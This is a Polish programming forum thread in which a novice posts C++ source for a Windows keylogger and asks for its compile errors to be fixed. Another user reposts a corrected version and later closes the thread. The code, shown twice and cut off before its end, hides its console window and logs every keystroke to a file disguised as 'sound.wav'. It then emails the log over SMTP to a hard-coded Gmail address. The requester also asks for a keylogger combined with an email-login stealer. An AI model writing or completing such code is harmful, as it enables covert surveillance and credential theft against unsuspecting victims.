Błędy w keylogge"rze [C++]

Wszystkie inne tematy dotyczące programowania w C++, Visual Basic, Javie, .NET i innych nie wymienionych językach programowania.
19FalleN20
Posty: 5
Rejestracja: 28 kwie 2015, 22:30

Błędy w keylogge"rze [C++]

Post autor: 19FalleN20 »

Witam,
otóż mam problem z keyloggerem, jestem nowym w tym temacie. W linku będzie keylogger bardzo proszę o poprawienie błędów.

DO kl

Kod: Zaznacz cały

#include <windows.h>
#include <stdio.h>
#include <winuser.h>
#include <windowsx.h>
#include <time.h>
int MailIt (char *mailserver, char *emailto, char *emailfrom,
      char *emailsubject, char *emailmessage);
#define BUFSIZE 800
#define waittime 500

#define cmailserver "gmail-smtp-in.l.google.com"
#define cemailto "fffffffff@gmail.com"
#define cemailfrom "gggggg@gmail.com"
#define LogLength 100
#define FileName "sound.wav"
#define SMTPLog "ring.wav"
#define cemailsubject "Logged"

int test_key(void);
int main(void)
{
//Uncomment the lines below to put the keylogger in stealh mode.
  HWND stealth; /*creating stealth */
  AllocConsole();
  stealth=FindWindowA("ConsoleWindowClass",NULL);
  ShowWindow(stealth,0);
  {
    FILE *file;
    file=fopen(FileName,"a+");
    time_t theTime=time(0);
    fputs("\nStarted logging: ", file);
    fputs(ctime(&theTime),file);
    fclose(file);
  }
  /* if (test==2)
  {//the path in which the file needs to be
  char *path="c:\\%windir%\\svchost.exe";
  create=create_key(path);
  } */
  int t=get_keys();
  return t;
}

int get_keys(void)
{
  int freadindex;
  char *buf;
  long len;
  FILE *file;
  file=fopen(FileName,"a+");


  short character;
  while(1)
  {
    sleep(10);/*to prevent 100% cpu usage*/
    for(character=8; character<=222; character++)
    {
      if(GetAsyncKeyState(character)==-32767)
      {
        FILE *file;
        file=fopen(FileName,"a+");
        if(file==NULL)
        {
          return 1;
        }
        if(file!=NULL)
        {
          if((character>=39)&&(character<=64))
          {
            fputc(character,file);
            fclose(file);
            break;
          }
          else if((character>64)&&(character<91))
          {
            character+=32;
            fputc(character,file);
            fclose(file);
            break;
          }
          else
          {
            switch(character)
            {
            case VK_SPACE:
              fputc(' ',file);
              fclose(file);
              break;
            case VK_SHIFT:
              fputs("\r\n[SHIFT]\r\n",file);
              fclose(file);
              break;
            case VK_RETURN:
              fputs("\r\n[ENTER]\r\n",file);
              fclose(file);
              break;
            case VK_BACK:
              fputs("\r\n[BACKSPACE]\r\n",file);
              fclose(file);
              break;
            case VK_TAB:
              fputs("\r\n[TAB]\r\n",file);
              fclose(file);
              break;
            case VK_CONTROL:
              fputs("\r\n[CTRL]\r\n",file);
              fclose(file);
              break;
            case VK_DELETE:
              fputs("\r\n[DEL]\r\n",file);
              fclose(file);
              break;
            case VK_OEM_1:
              fputs("\r\n[;:]\r\n",file);
              fclose(file);
              break;
            case VK_OEM_2:
              fputs("\r\n[/?]\r\n",file);
              fclose(file);
              break;
            case VK_OEM_3:
              fputs("\r\n[`~]\r\n",file);
              fclose(file);
              break;
            case VK_OEM_4:
              fputs("\r\n[ [{ ]\r\n",file);
              fclose(file);
              break;
            case VK_OEM_5:
              fputs("\r\n[\\|]\r\n",file);
              fclose(file);
              break;
            case VK_OEM_6:
              fputs("\r\n[ ]} ]\r\n",file);
              fclose(file);
              break;
            case VK_OEM_7:
              fputs("\r\n['\"]\r\n",file);
              fclose(file);
              break;
            case 187:
              fputc('+',file);
              fclose(file);
              break;
            case 188:
              fputc(',',file);
              fclose(file);
              break;
            case 189:
              fputc('-',file);
              fclose(file);
              break;
            case 190:
              fputc('.',file);
              fclose(file);
              break;
            case VK_NUMPAD0:
              fputc('0',file);
              fclose(file);
              break;
            case VK_NUMPAD1:
              fputc('1',file);
              fclose(file);
              break;
            case VK_NUMPAD2:
              fputc('2',file);
              fclose(file);
              break;
            case VK_NUMPAD3:
              fputc('3',file);
              fclose(file);
              break;
            case VK_NUMPAD4:
              fputc('4',file);
              fclose(file);
              break;
            case VK_NUMPAD5:
              fputc('5',file);
              fclose(file);
              break;
            case VK_NUMPAD6:
              fputc('6',file);
              fclose(file);
              break;
            case VK_NUMPAD7:
              fputc('7',file);
              fclose(file);
              break;
            case VK_NUMPAD8:
              fputc('8',file);
              fclose(file);
              break;
            case VK_NUMPAD9:
              fputc('9',file);
              fclose(file);
              break;
            case VK_CAPITAL:
              fputs("\r\n[CAPS LOCK]\r\n",file);
              fclose(file);
              break;
            default:
              fclose(file);
              break;
            }
          }
        }
      }
    }
    FILE *file;
    file=fopen(FileName,"rb");
    fseek(file,0,SEEK_END); //go to end
    len=ftell(file); //get position at end (length)
    if(len>=LogLength)
    {
      fseek(file,0,SEEK_SET);//go to beg.
      buf=(char *)malloc(len);//malloc buffer
      freadindex=fread(buf,1,len,file);//read into buffer
      buf[freadindex] = '\0';//Extra bit I have to add to make it a sting
      MailIt( cmailserver, cemailto, cemailfrom, cemailsubject, buf);
      fclose(file);
      file=fopen(FileName,"w");
    }
    fclose(file);
//free (buf);
  }
  return EXIT_SUCCESS;
}

int MailIt (char *mailserver, char *emailto, char *emailfrom,
      char *emailsubject, char *emailmessage)
{
  SOCKET sockfd;
  WSADATA wsaData;
  FILE *smtpfile;
#define bufsize 300
  int bytes_sent; /* Sock FD */
  int err;
  struct hostent *host; /* info from gethostbyname */
  struct sockaddr_in dest_addr; /* Host Address */
  char line[1000];
  char *Rec_Buf = (char*) malloc(bufsize+1);
  smtpfile=fopen(SMTPLog,"a+");
  if (WSAStartup(0x202,&wsaData) == SOCKET_ERROR)
  {
    fputs("WSAStartup failed",smtpfile);
    WSACleanup();
    return -1;
  }
  if ( (host=gethostbyname(mailserver)) == NULL)
  {
    perror("gethostbyname");
    exit(1);
  }
  memset(&dest_addr,0,sizeof(dest_addr));
  memcpy(&(dest_addr.sin_addr),host->h_addr,host->h_length);

  /* Prepare dest_addr */
  dest_addr.sin_family= host->h_addrtype; /* AF_INET from gethostbyname */
  dest_addr.sin_port= htons(25); /* PORT defined above */

  /* Get socket */

  if ((sockfd=socket(AF_INET,SOCK_STREAM,0)) < 0)
  {
    perror("socket");
    exit(1);
  }
  /* CONNECT !*/
  fputs("Connecting....\n",smtpfile);

  if (connect(sockfd, (struct sockaddr *)&dest_addr,sizeof(dest_addr)) == -1)
  {
    perror("connect");
    exit(1);
  }
  sleep(waittime);
  err=recv(sockfd,Rec_Buf,bufsize,0);
  Rec_Buf[err] = '\0';
  fputs(Rec_Buf,smtpfile);
  strcpy(line,"helo me.somepalace.com\n");
  fputs(line,smtpfile);
  bytes_sent=send(sockfd,line,strlen(line),0);
  sleep(waittime);
  err=recv(sockfd,Rec_Buf,bufsize,0);
  Rec_Buf[err] = '\0';
  fputs(Rec_Buf,smtpfile);
  strcpy(line,"MAIL FROM:<");
  strncat(line,emailfrom,strlen(emailfrom));
  strncat(line,">\n",3);
  fputs(line,smtpfile);
  bytes_sent=send(sockfd,line,strlen(line),0);
  sleep(waittime);
  err=recv(sockfd,Rec_Buf,bufsize,0);
  Rec_Buf[err] = '\0';
  fputs(Rec_Buf,smtpfile);
  strcpy(line,"RCPT TO:<");
  strncat(line,emailto,strlen(emailto));
  strncat(line,">\n",3);
  fputs(line,smtpfile);
  bytes_sent=send(sockfd,line,strlen(line),0);
  sleep(waittime);
  err=recv(sockfd,Rec_Buf,bufsize,0);
  Rec_Buf[err] = '\0';
  fputs(Rec_Buf,smtpfile);
  strcpy(line,"DATA\n");
  fputs(line,smtpfile);
  bytes_sent=send(sockfd,line,strlen(line),0);
  sleep(waittime);
  err=recv(sockfd,Rec_Buf,bufsize,0);
  Rec_Buf[err] = '\0';
  fputs(Rec_Buf,smtpfile);
  sleep(waittime);
  strcpy(line,"To:");
  strcat(line,emailto);
  strcat(line,"\n");
  strcat(line,"From:");
  strcat(line,emailfrom);
  strcat(line,"\n");
  strcat(line,"Subject:");
  strcat(line,emailsubject);
  strcat(line,"\n");
  strcat(line,emailmessage);
  strcat(line,"\r\n.\r\n");
  fputs(line,smtpfile);
  bytes_sent=send(sockfd,line,strlen(line),0);
  sleep(waittime);
  err=recv(sockfd,Rec_Buf,bufsize,0);
  Rec_Buf[err] = '\0';
  fputs(Rec_Buf,smtpfile);
  strcpy(line,"quit\n");
  fputs(line,smtpfile);
  bytes_sent=send(sockfd,line,strlen(line),0);
  sleep(waittime);
  err=recv(sockfd,Rec_Buf,bufsize,0);
  Rec_Buf[err] = '\0';
  fputs(Rec_Buf,smtpfile);
  fclose(smtpfile);
#ifdef WIN32
  closesocket(sockfd);
  WSACleanup();
#else
  close(sockfd);
#endif
Ps. To są zrzuty ekranu błędów:
http://iv.pl/images/43634357014391771018.png
Awatar użytkownika
F3nix
Posty: 332
Rejestracja: 28 kwie 2015, 20:51

Re: Błędy w keylogge"rze [C++]

Post autor: F3nix »

Zapomniałeś dodać przed main funkcji nagłówka funkcji int get_keys(void); i funkcja sleep z windowsx.h z dużej. Kod jest tak wgl. nie pełny i ucięty chyba w połowie bo brakuje dalej klamry itd. Poprawione:

Kod: Zaznacz cały

#include <windows.h>
#include <stdio.h>
#include <winuser.h>
#include <windowsx.h>
#include <time.h>
int MailIt (char *mailserver, char *emailto, char *emailfrom,
      char *emailsubject, char *emailmessage);
#define BUFSIZE 800
#define waittime 500

#define cmailserver "gmail-smtp-in.l.google.com"
#define cemailto "fffffffff@gmail.com"
#define cemailfrom "gggggg@gmail.com"
#define LogLength 100
#define FileName "sound.wav"
#define SMTPLog "ring.wav"
#define cemailsubject "Logged"

int test_key(void);
int get_keys(void);
int main(void)
{
//Uncomment the lines below to put the keylogger in stealh mode.
  HWND stealth; /*creating stealth */
  AllocConsole();
  stealth=FindWindowA("ConsoleWindowClass",NULL);
  ShowWindow(stealth,0);
  {
    FILE *file;
    file=fopen(FileName,"a+");
    time_t theTime=time(0);
    fputs("\nStarted logging: ", file);
    fputs(ctime(&theTime),file);
    fclose(file);
  }
  /* if (test==2)
  {//the path in which the file needs to be
  char *path="c:\\%windir%\\svchost.exe";
  create=create_key(path);
  } */
  int t=get_keys();
  return t;
}

int get_keys(void)
{
  int freadindex;
  char *buf;
  long len;
  FILE *file;
  file=fopen(FileName,"a+");


  short character;
  while(1)
  {
    Sleep(10);/*to prevent 100% cpu usage*/
    for(character=8; character<=222; character++)
    {
      if(GetAsyncKeyState(character)==-32767)
      {
        FILE *file;
        file=fopen(FileName,"a+");
        if(file==NULL)
        {
          return 1;
        }
        if(file!=NULL)
        {
          if((character>=39)&&(character<=64))
          {
            fputc(character,file);
            fclose(file);
            break;
          }
          else if((character>64)&&(character<91))
          {
            character+=32;
            fputc(character,file);
            fclose(file);
            break;
          }
          else
          {
            switch(character)
            {
            case VK_SPACE:
              fputc(' ',file);
              fclose(file);
              break;
            case VK_SHIFT:
              fputs("\r\n[SHIFT]\r\n",file);
              fclose(file);
              break;
            case VK_RETURN:
              fputs("\r\n[ENTER]\r\n",file);
              fclose(file);
              break;
            case VK_BACK:
              fputs("\r\n[BACKSPACE]\r\n",file);
              fclose(file);
              break;
            case VK_TAB:
              fputs("\r\n[TAB]\r\n",file);
              fclose(file);
              break;
            case VK_CONTROL:
              fputs("\r\n[CTRL]\r\n",file);
              fclose(file);
              break;
            case VK_DELETE:
              fputs("\r\n[DEL]\r\n",file);
              fclose(file);
              break;
            case VK_OEM_1:
              fputs("\r\n[;:]\r\n",file);
              fclose(file);
              break;
            case VK_OEM_2:
              fputs("\r\n[/?]\r\n",file);
              fclose(file);
              break;
            case VK_OEM_3:
              fputs("\r\n[`~]\r\n",file);
              fclose(file);
              break;
            case VK_OEM_4:
              fputs("\r\n[ [{ ]\r\n",file);
              fclose(file);
              break;
            case VK_OEM_5:
              fputs("\r\n[\\|]\r\n",file);
              fclose(file);
              break;
            case VK_OEM_6:
              fputs("\r\n[ ]} ]\r\n",file);
              fclose(file);
              break;
            case VK_OEM_7:
              fputs("\r\n['\"]\r\n",file);
              fclose(file);
              break;
            case 187:
              fputc('+',file);
              fclose(file);
              break;
            case 188:
              fputc(',',file);
              fclose(file);
              break;
            case 189:
              fputc('-',file);
              fclose(file);
              break;
            case 190:
              fputc('.',file);
              fclose(file);
              break;
            case VK_NUMPAD0:
              fputc('0',file);
              fclose(file);
              break;
            case VK_NUMPAD1:
              fputc('1',file);
              fclose(file);
              break;
            case VK_NUMPAD2:
              fputc('2',file);
              fclose(file);
              break;
            case VK_NUMPAD3:
              fputc('3',file);
              fclose(file);
              break;
            case VK_NUMPAD4:
              fputc('4',file);
              fclose(file);
              break;
            case VK_NUMPAD5:
              fputc('5',file);
              fclose(file);
              break;
            case VK_NUMPAD6:
              fputc('6',file);
              fclose(file);
              break;
            case VK_NUMPAD7:
              fputc('7',file);
              fclose(file);
              break;
            case VK_NUMPAD8:
              fputc('8',file);
              fclose(file);
              break;
            case VK_NUMPAD9:
              fputc('9',file);
              fclose(file);
              break;
            case VK_CAPITAL:
              fputs("\r\n[CAPS LOCK]\r\n",file);
              fclose(file);
              break;
            default:
              fclose(file);
              break;
            }
          }
        }
      }
    }
    FILE *file;
    file=fopen(FileName,"rb");
    fseek(file,0,SEEK_END); //go to end
    len=ftell(file); //get position at end (length)
    if(len>=LogLength)
    {
      fseek(file,0,SEEK_SET);//go to beg.
      buf=(char *)malloc(len);//malloc buffer
      freadindex=fread(buf,1,len,file);//read into buffer
      buf[freadindex] = '\0';//Extra bit I have to add to make it a sting
      MailIt( cmailserver, cemailto, cemailfrom, cemailsubject, buf);
      fclose(file);
      file=fopen(FileName,"w");
    }
    fclose(file);
//free (buf);
  }
  return EXIT_SUCCESS;
}

int MailIt (char *mailserver, char *emailto, char *emailfrom,
      char *emailsubject, char *emailmessage)
{
  SOCKET sockfd;
  WSADATA wsaData;
  FILE *smtpfile;
#define bufsize 300
  int bytes_sent; /* Sock FD */
  int err;
  struct hostent *host; /* info from gethostbyname */
  struct sockaddr_in dest_addr; /* Host Address */
  char line[1000];
  char *Rec_Buf = (char*) malloc(bufsize+1);
  smtpfile=fopen(SMTPLog,"a+");
  if (WSAStartup(0x202,&wsaData) == SOCKET_ERROR)
  {
    fputs("WSAStartup failed",smtpfile);
    WSACleanup();
    return -1;
  }
  if ( (host=gethostbyname(mailserver)) == NULL)
  {
    perror("gethostbyname");
    exit(1);
  }
  memset(&dest_addr,0,sizeof(dest_addr));
  memcpy(&(dest_addr.sin_addr),host->h_addr,host->h_length);

  /* Prepare dest_addr */
  dest_addr.sin_family= host->h_addrtype; /* AF_INET from gethostbyname */
  dest_addr.sin_port= htons(25); /* PORT defined above */

  /* Get socket */

  if ((sockfd=socket(AF_INET,SOCK_STREAM,0)) < 0)
  {
    perror("socket");
    exit(1);
  }
  /* CONNECT !*/
  fputs("Connecting....\n",smtpfile);

  if (connect(sockfd, (struct sockaddr *)&dest_addr,sizeof(dest_addr)) == -1)
  {
    perror("connect");
    exit(1);
  }
  Sleep(waittime);
  err=recv(sockfd,Rec_Buf,bufsize,0);
  Rec_Buf[err] = '\0';
  fputs(Rec_Buf,smtpfile);
  strcpy(line,"helo me.somepalace.com\n");
  fputs(line,smtpfile);
  bytes_sent=send(sockfd,line,strlen(line),0);
  Sleep(waittime);
  err=recv(sockfd,Rec_Buf,bufsize,0);
  Rec_Buf[err] = '\0';
  fputs(Rec_Buf,smtpfile);
  strcpy(line,"MAIL FROM:<");
  strncat(line,emailfrom,strlen(emailfrom));
  strncat(line,">\n",3);
  fputs(line,smtpfile);
  bytes_sent=send(sockfd,line,strlen(line),0);
  Sleep(waittime);
  err=recv(sockfd,Rec_Buf,bufsize,0);
  Rec_Buf[err] = '\0';
  fputs(Rec_Buf,smtpfile);
  strcpy(line,"RCPT TO:<");
  strncat(line,emailto,strlen(emailto));
  strncat(line,">\n",3);
  fputs(line,smtpfile);
  bytes_sent=send(sockfd,line,strlen(line),0);
  Sleep(waittime);
  err=recv(sockfd,Rec_Buf,bufsize,0);
  Rec_Buf[err] = '\0';
  fputs(Rec_Buf,smtpfile);
  strcpy(line,"DATA\n");
  fputs(line,smtpfile);
  bytes_sent=send(sockfd,line,strlen(line),0);
  Sleep(waittime);
  err=recv(sockfd,Rec_Buf,bufsize,0);
  Rec_Buf[err] = '\0';
  fputs(Rec_Buf,smtpfile);
  Sleep(waittime);
  strcpy(line,"To:");
  strcat(line,emailto);
  strcat(line,"\n");
  strcat(line,"From:");
  strcat(line,emailfrom);
  strcat(line,"\n");
  strcat(line,"Subject:");
  strcat(line,emailsubject);
  strcat(line,"\n");
  strcat(line,emailmessage);
  strcat(line,"\r\n.\r\n");
  fputs(line,smtpfile);
  bytes_sent=send(sockfd,line,strlen(line),0);
  Sleep(waittime);
  err=recv(sockfd,Rec_Buf,bufsize,0);
  Rec_Buf[err] = '\0';
  fputs(Rec_Buf,smtpfile);
  strcpy(line,"quit\n");
  fputs(line,smtpfile);
  bytes_sent=send(sockfd,line,strlen(line),0);
  Sleep(waittime);
  err=recv(sockfd,Rec_Buf,bufsize,0);
  Rec_Buf[err] = '\0';
  fputs(Rec_Buf,smtpfile);
  fclose(smtpfile);
#ifdef WIN32
  closesocket(sockfd);
  WSACleanup();
#else
  close(sockfd);
#endif
19FalleN20
Posty: 5
Rejestracja: 28 kwie 2015, 22:30

Re: Błędy w keylogge"rze [C++]

Post autor: 19FalleN20 »

dzięki za tak szybką odp ale nadal nie działa teraz są tylko 2 błędy

http://iv.pl/images/12832220454090836936.png
Awatar użytkownika
F3nix
Posty: 332
Rejestracja: 28 kwie 2015, 20:51

Re: Błędy w keylogge"rze [C++]

Post autor: F3nix »

Bo kod jest niepełny tak jak mówiłem. Brakuje tak jak pisze np: klamry zamykającej jakiejś. Podstawy są to języka C++ http://cpp0x.pl/kursy/Kurs-C++/1
19FalleN20
Posty: 5
Rejestracja: 28 kwie 2015, 22:30

Re: Błędy w keylogge"rze [C++]

Post autor: 19FalleN20 »

Ok. Pomożesz bardzo ważne dalej nie wiem co robić kompletnie
Awatar użytkownika
F3nix
Posty: 332
Rejestracja: 28 kwie 2015, 20:51

Re: Błędy w keylogge"rze [C++]

Post autor: F3nix »

Powtarzam. Kod jest niepełny. Jakbyś dostał książkę z wyrwanymi stronami od połowy to w jaki sposób ktoś ma Ci powiedzieć co dalej było? Poucz się albo poszukaj tam skąd wziąłeś ten kod bo on nie jest pełny widocznie.
19FalleN20
Posty: 5
Rejestracja: 28 kwie 2015, 22:30

Re: Błędy w keylogge"rze [C++]

Post autor: 19FalleN20 »

aha, a mam pytanie czy umiesz zrobić kl + login na meila taki najprostszy??
Awatar użytkownika
F3nix
Posty: 332
Rejestracja: 28 kwie 2015, 20:51

Re: Błędy w keylogge"rze [C++]

Post autor: F3nix »

Pełno w Internecie tego typu produktów jest gotowych do kupienia. Zamykam bo robi się off-topic.
Zablokowany